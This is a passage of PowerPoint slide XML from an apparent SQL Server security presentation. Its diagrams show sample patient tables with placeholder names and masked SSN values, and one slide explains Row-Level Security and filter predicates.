            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="8481246" y="5393031"/>
                <a:ext cx="718776"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USA</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="242" name="Rectangle 241"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5883385" y="5698644"/>
                <a:ext cx="1395172" cy="284657"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="BFBFB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Luka Abrus</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="243" name="Rectangle 242"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7296647" y="5698644"/>
                <a:ext cx="1166510"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0x7ff654ae6d</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="244" name="Rectangle 243"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="8481246" y="5698644"/>
                <a:ext cx="718776"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USA</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="245" name="Rectangle 244"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5883385" y="6004257"/>
                <a:ext cx="1395172" cy="284657"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="BFBFB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Tanja Plate</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="246" name="Rectangle 245"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7296647" y="6004257"/>
                <a:ext cx="1166510"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0x8fj754ea2c</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="247" name="Rectangle 246"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="8481246" y="6004257"/>
                <a:ext cx="718776"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USA</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="239" name="Rectangle 238"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7296647" y="5393031"/>
                <a:ext cx="1166510"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0x7fg655se2e</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="248" name="Rectangle 247"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="8481246" y="5106365"/>
                <a:ext cx="718776" cy="28465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Country</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="252" name="Group 251"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7828636" y="4759941"/>
              <a:ext cx="3314826" cy="1602267"/>
              <a:chOff x="6364740" y="4692041"/>
              <a:chExt cx="3316627" cy="1603138"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="253" name="Rectangle 252"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6364740" y="5401023"/>
                <a:ext cx="1395172"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Mark Hanson</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="254" name="Rectangle 253"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6364740" y="5116366"/>
                <a:ext cx="1395172" cy="28465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Name</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="255" name="Rectangle 254"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7777996" y="5401023"/>
                <a:ext cx="1166510"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0x7fg655se2e</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="256" name="Rectangle 255"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7777997" y="5116366"/>
                <a:ext cx="1166510" cy="28465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SSN</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="257" name="Rectangle 256"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="8962591" y="5401023"/>
                <a:ext cx="718776"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USA</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="258" name="Rectangle 257"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="8962591" y="5116366"/>
                <a:ext cx="718776" cy="28465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Country</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="259" name="Rectangle 258"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6364740" y="5705772"/>
                <a:ext cx="1395172" cy="28465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Luka Abrus</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="260" name="Rectangle 259"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7777996" y="5705772"/>
                <a:ext cx="1166510" cy="28465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0x7ff654ae6d</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="261" name="Rectangle 260"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="8962591" y="5705772"/>
                <a:ext cx="718776" cy="284657"/>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000000"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>USA</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="262" name="Rectangle 261"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6364740" y="6010522"/>
                <a:ext cx="1395172"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Tanja Plate</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="263" name="Rectangle 262"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7777996" y="6010522"/>
                <a:ext cx="1166510"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0x8fj754ea2c</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="264" name="Rectangle 263"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="8962591" y="6010522"/>
                <a:ext cx="718776" cy="28465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USA</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="265" name="Rectangle 264"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6381948" y="4692041"/>
                <a:ext cx="2188984" cy="47682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39" rIns="0" bIns="47539" numCol="1" rtlCol="0" anchor="b" anchorCtr="0" compatLnSpc="1">
                <a:prstTxWarp prst="textNoShape">
                  <a:avLst/>
                </a:prstTxWarp>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="950470"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rgbClr val="FF8C00"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>dbo.Patients</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="266" name="U-Turn Arrow 265"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="8171523" y="3507751"/>
              <a:ext cx="1188074" cy="456952"/>
            </a:xfrm>
            <a:prstGeom prst="uturnArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 19654"/>
                <a:gd name="adj2" fmla="val 20379"/>
                <a:gd name="adj3" fmla="val 16398"/>
                <a:gd name="adj4" fmla="val 44310"/>
                <a:gd name="adj5" fmla="val 100000"/>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5" tIns="146203" rIns="182755" bIns="146203" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="342632" marR="0" lvl="0" indent="-342632" algn="ctr" defTabSz="931745" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
                <a:buChar char="Æ"/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr kumimoji="0" lang="en-IN" sz="1999" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="267" name="Rectangle 266"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7458639" y="3921752"/>
              <a:ext cx="1685023" cy="47656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39" rIns="0" bIns="47539" numCol="1" rtlCol="0" anchor="b" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="950470" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1599" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF8C00"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Result set</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="268" name="Group 267"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7475248" y="4377548"/>
              <a:ext cx="2982977" cy="564517"/>
              <a:chOff x="3145602" y="5845156"/>
              <a:chExt cx="2984178" cy="564745"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="269" name="Group 268"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3145602" y="5845156"/>
                <a:ext cx="1088136" cy="563740"/>
                <a:chOff x="5615841" y="5816382"/>
                <a:chExt cx="1088136" cy="563740"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="276" name="Rectangle 275"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5615841" y="6095501"/>
                  <a:ext cx="1088136" cy="284621"/>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Luka Abrus</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="277" name="Rectangle 276"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5615841" y="5816382"/>
                  <a:ext cx="1088136" cy="280500"/>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Name</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="270" name="Group 269"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4249881" y="5845156"/>
                <a:ext cx="1192231" cy="563717"/>
                <a:chOff x="6707738" y="5816382"/>
                <a:chExt cx="1192231" cy="563717"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="274" name="Rectangle 273"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6707738" y="6095502"/>
                  <a:ext cx="1192231" cy="284597"/>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0x7ff654ae6d</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="275" name="Rectangle 274"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6707738" y="5816382"/>
                  <a:ext cx="1192231" cy="280500"/>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SSN</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="271" name="Group 270"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5458253" y="5845156"/>
                <a:ext cx="671527" cy="564745"/>
                <a:chOff x="7912335" y="5816382"/>
                <a:chExt cx="671527" cy="564745"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="272" name="Rectangle 271"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7912335" y="6095502"/>
                  <a:ext cx="671527" cy="285625"/>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USA</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="273" name="Rectangle 272"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7912335" y="5816382"/>
                  <a:ext cx="671527" cy="279417"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="4716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54834"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Country</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="278" name="Rectangle 277"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2839534" y="4664058"/>
              <a:ext cx="1191751" cy="277061"/>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4834" tIns="36556" rIns="0" bIns="146224" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="932014" rtl="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a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>000-33-0987</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="407139735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4638" y="1524001"/>
            <a:ext cx="11626850" cy="16056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2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Row-Level Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1658381"/>
            <a:ext cx="11467118" cy="133689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182880" tIns="91440" rIns="182880" bIns="9144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3505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="85000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Row-Level Security (RLS) enables you to control access to rows in a database table based on the characteristics of the user executing a query (for example, in a group membership or execution context)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="263948" y="3309258"/>
            <a:ext cx="11660369" cy="301318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182880" tIns="91440" rIns="182880" bIns="9144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3505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The database system applies the access restrictions every time a tier attempts to access data. This makes the security system more reliable and robust by reducing the surface area of your security system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>RLS works with a predicate condition that, when true, allows access to appropriate rows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>There are two types of security predicates: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>filter</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> predicate filters out rows from a query. The filter is transparent, and the end user is unaware of any filtering.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
